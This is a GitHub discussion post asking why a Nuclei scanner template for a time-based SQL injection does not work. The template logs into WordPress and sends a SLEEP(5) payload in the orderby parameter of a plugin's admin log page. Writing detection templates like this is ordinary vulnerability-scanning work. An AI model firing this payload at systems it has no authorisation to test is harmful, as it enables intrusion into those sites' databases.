### DISCUSSION TITLE
time-based sqli not work

### DISCUSSION THREAD

**Discussion by cckuailong** [projectdiscovery/nuclei-templates#3662] [Q&A]
I wrote some time based sqli, but it seems not work with nuclei.

![image](https://user-images.githubusercontent.com/10824150/152468732-b1c97743-4f9f-4a0b-b999-ae62484fefe5.png)

my template is here (poc with burp works well)

```
requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=i4t3-logs&orderby=1%20AND%20(SELECT%204291%20FROM%20(SELECT(SLEEP(5)))cxXu) HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "404 Error Logs"

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - 'duration>=5'
```
